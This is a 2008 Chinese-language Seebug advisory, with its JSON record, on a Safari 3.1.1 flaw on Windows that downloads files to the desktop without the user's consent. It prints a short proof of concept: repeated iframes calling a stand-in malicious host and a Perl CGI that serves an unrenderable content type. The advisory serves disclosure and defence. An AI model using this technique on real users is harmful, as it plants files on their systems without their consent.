Windows上Apple Safari任意文件下载执行漏洞

2008-06-03T00:00:00

Description

BUGTRAQ ID: 29445 Safari是苹果家族操作系统所捆绑的WEB浏览器。 Safari浏览器无法配置为在下载资源之前获得用户的许可，未经用户同意便将资源下载到了默认的位置。假设用户访问了提供以下HTML的恶意站点http://malicious.example.com/ ： <HTML> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> ... ... ... ... <iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe> </HTML> 其中http://malicious.example.com/cgi-bin/carpet_bomb.cgi 为： #!/usr/bin/perl print "Content-type: blah/blah\n\n" 由于Safari不知道如何渲染blah/blah内容类型，就会自动开始下载carpet_bomb.cgi。如果在Windows平台上使用Safari的话，访问http://malicious.example.com/ 后就会未经用户同意向用户桌面下载恶意软件。 Apple Safari 3.1.1 - Microsoft Windows XP SP3 - Microsoft Windows XP SP2 - Microsoft Windows Vista 临时解决方法： * 将Safari的文件下载位置更改为非桌面。厂商补丁： Apple ----- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： <a href=http://www.apple.com target=_blank>http://www.apple.com</a>

{"href": "https://www.seebug.org/vuldb/ssvid-3365", "status": "details", "bulletinFamily": "exploit", "modified": "2008-06-03T00:00:00", "title": "Windows\u4e0aApple Safari\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6267\u884c\u6f0f\u6d1e", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "", "cvelist": [], "description": "BUGTRAQ ID: 29445\r\n\r\nSafari\u662f\u82f9\u679c\u5bb6\u65cf\u64cd\u4f5c\u7cfb\u7edf\u6240\u6346\u7ed1\u7684WEB\u6d4f\u89c8\u5668\u3002\r\n\r\nSafari\u6d4f\u89c8\u5668\u65e0\u6cd5\u914d\u7f6e\u4e3a\u5728\u4e0b\u8f7d\u8d44\u6e90\u4e4b\u524d\u83b7\u5f97\u7528\u6237\u7684\u8bb8\u53ef\uff0c\u672a\u7ecf\u7528\u6237\u540c\u610f\u4fbf\u5c06\u8d44\u6e90\u4e0b\u8f7d\u5230\u4e86\u9ed8\u8ba4\u7684\u4f4d\u7f6e\u3002\r\n\r\n\u5047\u8bbe\u7528\u6237\u8bbf\u95ee\u4e86\u63d0\u4f9b\u4ee5\u4e0bHTML\u7684\u6076\u610f\u7ad9\u70b9http://malicious.example.com/ \uff1a\r\n\r\n<HTML>\r\n<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>\r\n<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>\r\n<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>\r\n...\r\n...\r\n...\r\n...\r\n<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>\r\n</HTML>\r\n\r\n\u5176\u4e2dhttp://malicious.example.com/cgi-bin/carpet_bomb.cgi \u4e3a\uff1a\r\n\r\n#!/usr/bin/perl\r\nprint "Content-type: blah/blah\\n\\n"\r\n\r\n\u7531\u4e8eSafari\u4e0d\u77e5\u9053\u5982\u4f55\u6e32\u67d3blah/blah\u5185\u5bb9\u7c7b\u578b\uff0c\u5c31\u4f1a\u81ea\u52a8\u5f00\u59cb\u4e0b\u8f7dcarpet_bomb.cgi\u3002\u5982\u679c\u5728Windows\u5e73\u53f0\u4e0a\u4f7f\u7528Safari\u7684\u8bdd\uff0c\u8bbf\u95eehttp://malicious.example.com/ \u540e\u5c31\u4f1a\u672a\u7ecf\u7528\u6237\u540c\u610f\u5411\u7528\u6237\u684c\u9762\u4e0b\u8f7d\u6076\u610f\u8f6f\u4ef6\u3002\r\n\n\nApple Safari 3.1.1\r\n - Microsoft Windows XP SP3 \r\n - Microsoft Windows XP SP2 \r\n - Microsoft Windows Vista\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5c06Safari\u7684\u6587\u4ef6\u4e0b\u8f7d\u4f4d\u7f6e\u66f4\u6539\u4e3a\u975e\u684c\u9762\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n<a href=http://www.apple.com target=_blank>http://www.apple.com</a>", "viewCount": 5, "published": "2008-06-03T00:00:00", "sourceData": "", "id": "SSV:3365", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:45:22", "reporter": "Root", "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647691713}}